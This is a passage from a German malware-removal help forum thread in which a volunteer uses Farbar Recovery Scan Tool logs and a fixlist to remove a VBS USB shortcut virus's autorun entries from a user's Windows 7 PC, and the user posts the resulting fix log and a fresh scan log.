2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001
2014-03-24 01:36 - 2014-03-21 07:44 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-23 13:40 - 2014-02-28 13:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\iFunbox_UserCache
2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu

Some content of TEMP:
====================
C:\Users\Franz\AppData\Local\Temp\avgnt.exe
C:\Users\Franz\AppData\Local\Temp\Quarantine.exe
C:\Users\Franz\AppData\Local\Temp\{04F28610-2CBA-4508-A95B-D654F15084A8}-34.0.1847.116_33.0.1750.154_chrome_updater.exe


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2014-03-24 00:49

==================== End Of Log ============================
         
--- --- ---

Alt 18.04.2014, 18:01   #10
schrauber
/// the machine
/// TB-Ausbilder
 

Flash Drive Shortcut Virus wtbchkxbde..vbs - Standard

Flash Drive Shortcut Virus wtbchkxbde..vbs



Erstmal haben wir alles runum gekillt

Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:
ATTFilter
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()
2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
         

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
  • Starte nun FRST erneut und klicke den Entfernen Button.
  • Das Tool erstellt eine Fixlog.txt.
  • Poste mir deren Inhalt.

__________________
gruß,
schrauber

Proud Member of UNITE and ASAP since 2009

Spenden
Anleitungen und Hilfestellungen
Trojaner-Board Facebook-Seite

Keine Hilfestellung via PM!

Alt 18.04.2014, 23:27   #11
fxak
 
Flash Drive Shortcut Virus wtbchkxbde..vbs - Standard

Flash Drive Shortcut Virus wtbchkxbde..vbs



Habe alles gemacht, die .vbs kommt nach formatieren weiterhin auf dem Stick

Fixlog.txt:
Code:
ATTFilter
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 17-04-2014 01
Ran by Franz at 2014-04-18 23:14:09 Run:1
Running from C:\Users\Franz\Desktop
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()
2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
         
*****************

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\wtbchkxbde => Value deleted successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\wtbchkxbde => Value deleted successfully.
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\Software\Microsoft\Windows\CurrentVersion\Run\\wtbchkxbde => Value deleted successfully.
C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs => Moved successfully.
Could not move "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" => Scheduled to move on reboot.

=> Result of Scheduled Files to move (Boot Mode: Normal) (Date&Time: 2014-04-18 23:16:01)<=

C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs => Is moved successfully.

==== End of Fixlog ====
         

Alt 19.04.2014, 13:38   #12
schrauber
/// the machine
/// TB-Ausbilder
 

Flash Drive Shortcut Virus wtbchkxbde..vbs - Standard

Flash Drive Shortcut Virus wtbchkxbde..vbs



Frisches FRST log bitte.
__________________
gruß,
schrauber

Proud Member of UNITE and ASAP since 2009

Spenden
Anleitungen und Hilfestellungen
Trojaner-Board Facebook-Seite

Keine Hilfestellung via PM!

Alt 20.04.2014, 05:23   #13
fxak
 
Flash Drive Shortcut Virus wtbchkxbde..vbs - Standard

Flash Drive Shortcut Virus wtbchkxbde..vbs



FRST.txt:


FRST Logfile:
Code:
ATTFilter
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 17-04-2014 01
Ran by Franz (administrator) on FRANZ-PC on 20-04-2014 05:20:46
Running from C:\Users\Franz\Desktop
Windows 7 Home Premium (X64) OS Language: German Standard
Internet Explorer Version 9
Boot Mode: Normal


==================== Processes (Whitelisted) =================

(AMD) C:\Windows\system32\atiesrxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(AMD) C:\Windows\system32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Locktime Software) C:\Program Files\NetLimiter 3\nlsvc.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
(Acer Group) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Alcor Micro Corp.) C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Locktime Software) C:\Program Files\NetLimiter 3\NLClientApp.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apntex.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidFind.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe
(Intel Corporation) C:\Windows\system32\igfxext.exe
(Intel Corporation) C:\Windows\system32\igfxsrvc.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Panda Security) C:\Program Files (x86)\Panda USB Vaccine\USBVaccine.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2009-09-23] (Alcor Micro Corp.)
HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9996320 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [585376 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [354464 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-09] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-02-02] (Acer Incorporated)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [260608 2010-03-09] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-04-21] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-26] (Dritek System Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [689744 2014-02-20] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.ph/intl/en/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532
BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)

FireFox:
========
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.0.6 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)

Chrome: 
=======
CHR Plugin: (Shockwave Flash) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\PepperFlash\11.7.700.202\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Extension: (Google Docs) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-05-15]
CHR Extension: (Google Drive) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-05-15]
CHR Extension: (YouTube) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-05-15]
CHR Extension: (Google-Suche) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-05-15]
CHR Extension: (Google Wallet) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-10]

==================== Services (Whitelisted) =================

R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [820768 2010-02-02] (Acer Incorporated)
R2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software)
R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [260640 2010-01-29] (Acer Incorporated)

==================== Drivers (Whitelisted) ====================

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-12-15] (Avira Operations GmbH & Co. KG)
R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-04-20 05:20 - 2014-04-20 05:20 - 00015472 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-18 23:16 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-04-18 23:13 - 2014-04-18 23:13 - 00000000 ____D () C:\Users\Franz\Desktop\FRST-OlderVersion
2014-04-16 23:57 - 2014-04-16 23:59 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:07 - 2014-04-16 23:10 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\ Malwarebytes Anti-Malware 
2014-04-16 23:06 - 2014-04-03 09:51 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-16 23:06 - 2014-04-03 09:51 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-16 23:06 - 2014-04-03 09:50 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-16 02:56 - 2014-04-16 03:44 - 00000000 ____D () C:\Qoobox
2014-04-16 02:56 - 2014-04-16 03:35 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 02:56 - 2011-06-26 08:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-04-16 02:56 - 2010-11-07 19:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-04-16 02:56 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00098816 _____ () C:\Windows\sed.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00080412 _____ () C:\Windows\grep.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00068096 _____ () C:\Windows\zip.exe
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-16 02:47 - 2014-04-16 02:48 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-14 11:21 - 2008-03-22 04:21 - 733980672 ___SH () C:\Users\Franz\Desktop\The Seeker-The Dark is Rising[2007]DvDrip[Eng]-FXG.avi
2014-04-14 11:19 - 2012-11-07 09:32 - 247528059 ___SH () C:\Users\Franz\Desktop\Amityville Horror 2 The Possession (Full Movie) - YouTube.flv
2014-04-14 11:19 - 2010-01-05 16:04 - 956607690 ___SH () C:\Users\Franz\Desktop\The Marine 2 (2010) DVDR DivXNL-Team.avi
2014-04-14 10:43 - 2014-04-20 05:20 - 00000000 ____D () C:\FRST
2014-04-14 10:40 - 2014-04-18 23:13 - 02158592 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-11 05:39 - 2014-03-04 14:07 - 142602520 _____ (Microsoft Corporation) C:\Users\Franz\Desktop\wlsetup-all_16.4.3508.0205.exe
2014-04-07 09:32 - 2014-04-09 10:19 - 00000000 ____D () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-03 10:10 - 2014-04-12 01:15 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-02 08:42 - 2014-04-16 22:12 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:19 - 2014-04-02 08:54 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 06:29 - 2013-02-01 10:07 - 557660892 _____ () C:\Users\Franz\Desktop\Bavaria Traumreise durch Bayern.mkv
2014-04-02 06:15 - 2013-03-03 06:17 - 3702646581 _____ () C:\Users\Franz\Desktop\Das grüne Wunder - Unser Wald.mkv
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001
2014-03-21 07:44 - 2014-03-24 01:36 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games

==================== One Month Modified Files and Folders =======

2014-04-20 05:21 - 2014-04-20 05:20 - 00015472 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-20 05:20 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST
2014-04-20 05:20 - 2013-04-16 20:29 - 00000043 _____ () C:\Users\Public\Documents\AtherosServiceConfig.ini
2014-04-20 04:51 - 2013-04-16 19:13 - 01757146 _____ () C:\Windows\WindowsUpdate.log
2014-04-20 04:46 - 2013-04-17 05:01 - 00696870 _____ () C:\Windows\system32\perfh007.dat
2014-04-20 04:46 - 2013-04-17 05:01 - 00148134 _____ () C:\Windows\system32\perfc007.dat
2014-04-20 04:46 - 2009-07-14 07:13 - 01612484 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-04-20 04:42 - 2013-04-16 20:09 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-04-20 04:41 - 2009-07-14 06:51 - 00088960 _____ () C:\Windows\setupact.log
2014-04-19 03:21 - 2013-04-16 20:22 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\vlc
2014-04-18 23:23 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-04-18 23:23 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-04-18 23:16 - 2013-04-16 20:09 - 00001104 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-04-18 23:15 - 2010-05-11 01:15 - 00114178 _____ () C:\Windows\PFRO.log
2014-04-18 23:15 - 2009-07-14 07:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-04-18 23:14 - 2013-04-16 19:54 - 00000000 ___RD () C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-04-18 23:13 - 2014-04-18 23:13 - 00000000 ____D () C:\Users\Franz\Desktop\FRST-OlderVersion
2014-04-18 23:13 - 2014-04-14 10:40 - 02158592 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-17 00:00 - 2014-03-11 17:56 - 00000000 ____D () C:\AdwCleaner
